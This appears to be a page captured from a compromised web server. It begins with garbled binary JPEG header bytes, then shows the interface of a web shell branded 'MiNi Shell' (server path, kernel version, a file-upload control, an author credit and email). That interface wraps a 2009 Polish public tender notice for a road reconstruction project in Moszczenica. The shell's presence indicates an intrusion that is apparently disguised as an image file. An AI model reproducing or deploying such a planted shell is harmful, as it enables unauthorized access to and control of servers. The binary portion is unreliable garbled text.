JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090519/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090519/77437-N-2009.html

<p class="kh_header"><b>Moszczenica: Przebudowa drogi Rękoraj- Moszczenica, gm. Moszczenica, pow. piotrkowski, woj. łódzkie</b><br>
<b>Numer ogłoszenia: 77437 - 2009; data zamieszczenia: 19.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Moszczenica , ul. Kosowska 1, 97-310 Moszczenica, woj. łódzkie, tel. 044 6169570, faks 044 6169625.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.moszczenica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi Rękoraj- Moszczenica, gm. Moszczenica, pow. piotrkowski, woj. łódzkie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W zakres dokumentacji wchodzą:
	wykonanie projektów budowlanych (w tym projektów wykonawczych) w branżach: drogowej, mostowej, instalacyjnej, elektrycznej, telekomunikacyjnej
	wykonanie projektów usunięcia kolizji
	opracowanie mapy w skali co najmniej 1:5 000 przedstawiającą proponowany przebieg drogi, z zaznaczeniem terenu niezbędnego dla obiektów budowlanych, oraz istniejące uzbrojenie terenu;
	wykonanie analizy powiązania drogi z innymi drogami publicznymi;
	wykonanie mapy zawierającej projekty podziału nieruchomości, sporządzone zgodnie z odrębnymi przepisami;
	określenie zmian w dotychczasowej infrastrukturze zagospodarowania terenu;
	uzyskanie niezbędnych opinii zgodnie z art. 11b ust. 1, art. 11d. ust. 1 pkt 8 ustawy o szczególnych zasadach przygotowania i realizacji inwestycji
     w zakresie dróg publicznych z dnia 10 kwietnia 2003 r. ( t.j. Dz. U. Nr 80, poz. 721 ze zm.)
	uzyskanie decyzji o środowiskowych uwarunkowaniach zgody na realizację inwestycji
	uzyskanie decyzji lokalizacji celu publicznego w zakresie kanalizacji sanitarnej z przyłączami, sieci wodociągowej z przyłączami oraz oświetlenia ulicznego
	opracowanie specyfikacji technicznych wykonania i odbioru robót budowlanych
	opracowanie informacji dotyczących bezpieczeństwa i ochrony zdrowia (BIOZ);
	uzyskanie wszystkich niezbędnych uzgodnień do projektów budowlanych (min. uzgodnienie z Wojewódzkim Zarządem Melioracji i Urządzeń Wodnych, uzgodnienie p. poż., uzgodnienie w Zespole Uzgadniania Dokumentacji, uzgodnienie włączenia do drogi krajowej 91, uzgodnienie włączenia do drogi wojewódzkiej 716, uzgodnienie z Wojewódzkim Konserwatorem Zabytków uzgodnienie z Operatorem Gazociągów Przesyłowych, uzgodnienie z Zakładem  Energetycznym)
	wykonanie operatów wodno - prawnych oraz uzyskanie decyzji wodno-prawnych
	przygotowanie dokumentów niezbędnych do uzyskania decyzji na realizację inwestycji drogowej zgodnie z ustawą o szczególnych zasadach przygotowania i realizacji inwestycji zakresie dróg publicznych z dnia 10 kwietnia 2003 r. ( t.j. Dz. U. Nr 80, poz. 721 ze zm.)
	uzyskanie decyzji o zezwoleniu na realizację inwestycji drogowej zgodnie z ustawą o szczególnych zasadach przygotowania i realizacji inwestycji zakresie dróg publicznych z dnia 10 kwietnia 2003 r. ( t.j. Dz. U. Nr 80, poz. 721 ze zm.)
	wykonanie przedmiaru robót, kosztorysu szczegółowego tzw. ślepego oraz wykonanie kosztorysu inwestorskiego
	wykonanie projektu organizacji ruchu na czas robót
	wykonanie projektu docelowej organizacji ruchu
	wykonanie badań warunków gruntowo - wodnych niezbędnych do wykonania dokumentacji technicznej i przedstawienie dokumentacji tych badań 
	wykonanie badań geologicznych (nie mniej niż 2 odwierty na 1 km oraz dodatkowe zagęszczenie na odcinkach mostowych, badania geotechniczne)  i przedstawienie dokumentacji tych badań
	uzyskanie decyzji pozwolenia na budowę dotyczącą kanalizacji sanitarnej z przyłączami, sieci wodociągowej z przyłączami oraz oświetlenia ulicznego
	uzyskanie zgody i podpisanie umów użyczenia z właścicielami działek przez które będzie przechodziła sieć kanalizacji sanitarnej i przyłącza kanalizacyjne oraz sieć wodociągowa i przyłącza wodociągowe (umowa użyczenia z właścicielami działek powinna zawierać również załącznik w postaci mapy obejmującej teren użyczającego zaznaczonym przebiegiem sieci jaki i przyłącza, również naniesienie połączenia studni kanalizacyjnej z budynkiem mieszkalnym oraz pisemną akceptację użyczającego (w tym na załączniku graficznym) wyrażającym zgodę  i akceptację lokalizacji odpowiednio sieci, przyłącza i lokalizacji przyłączenia do budynku)
zgodnie z wytycznymi i warunkami określonymi w niniejszej specyfikacji istotnych warunków zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.20.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się wykonawcy, którzy:
1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień tj.
a.	prowadzą działalność gospodarczą na zasadach określonych w przepisach ustawy z dn. 2 lipca 2004r. o swobodzie działalności gospodarczej (Dz. U. z 2004r. Nr 173, poz. 1807 ze zm.)
b.	nie zalegają z opłacaniem podatków, opłat składek na ubezpieczenie zdrowotne i społeczne lub uzyskali przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu
2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia 
a.	w okresie ostatnich 3 lat wykonali  lub wykonują co najmniej 2 projekty budowlano -wykonawcze lub projekty budowlane na przebudowę lub rozbudowę drogi klasy technicznej min. L o długości całkowitej równej lub większej niż 3 km, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, oraz potwierdzenie, że wykonane projekty zostały wykonane należycie
b.	zapewnią, aby czynności objęte zamówieniem były wykonywane    bezpośrednio przez osoby posiadające uprawnienia do projektowania lub inne ważne uprawnienia i dokumenty, które (zgodnie z obowiązującymi przepisami) pozwolą wykonać dokumentację techniczną (z wyszczególnieniem dokumentów dotyczących osobno autorów projektu i osób sprawdzających projekt) w branżach:
-	drogowej
-	mostowej
-	instalacyjnej
-	elektrycznej
-	telekomunikacyjnej

3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia 
a.	posiadają polisę lub inny dokument od odpowiedzialności cywilnej w zakresie prowadzonej działalności
4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia;
a.	wykonawca spełnia warunki udziału w postępowaniu i nie podlega wykluczeniu z      postępowania o udzielenie zamówienia publicznego zgodnie z art. 24 ust. 1 i 2 z ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Celem potwierdzenia spełnienia warunków, stawianych oferentom przez zamawiającego oraz dla uznania formalnej poprawności oferta musi zawierać następujące dokumenty (złożone w formie pisemnej) lub poświadczone za zgodność z oryginałem ich kserokopie lub odpisy:

I. W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, zwanej dalej ustawą, zamawiający żąda następujących dokumentów: 

1.	aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składnia wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;
2.	aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu- wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.

II. W celu potwierdzenia opisanego przez zamawiającego warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia zamawiający żąda następujących dokumentów:
a.	wykazu wykonanych, a przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia (w tym co najmniej 2 projekty budowlano -wykonawcze lub projekty budowlane na przebudowę lub rozbudowę drogi klasy technicznej min. L o długości całkowitej równej lub większej niż 3 km), a jeżeli okres działalności jest krótszy- w tym okresie, odpowiadających swoim rodzajem i wartością dostawą lub usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu , dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających że te dostawy lub usługi zostały wykonane należycie
b.	wykazu osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonywania zamówienia, a także zakresu wykonywanych przez nie czynności 
c.	pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt.2, wykonawca wskazał osoby, którymi będzie dysponował
d.	stwierdzających, że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień

III. W celu potwierdzenia opisanego przez zamawiającego warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia zamawiający żąda następujących dokumentów:
1.	polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności

IV. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 6 ust. I:

1.	pkt 2 składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo, że uzyskał przewidziane prawem   zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
2. Dokumenty , o których mowa w ust. IVpkt1 lit. a i c, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo o składania ofert. Dokument , o którym mowa w ust. IV pkt1 lit. b powinien być wystawiony nie wcześniej niż 3 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo o składania ofert
3. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaję się dokumentów, o których mowa  w pkt. 6 ust. I, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania

Dokumenty, o których mowa mogą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę lub upełnomocnionego przedstawiciela wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.moszczenica.bipst.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Moszczenicy
ul. Kosowska 1
97-310 Moszczenica.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2009 godzina 10:00, miejsce: Urząd Gminy w Moszczenicy ul. Kosowska 1, 97-310 Moszczenica pok. 13.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com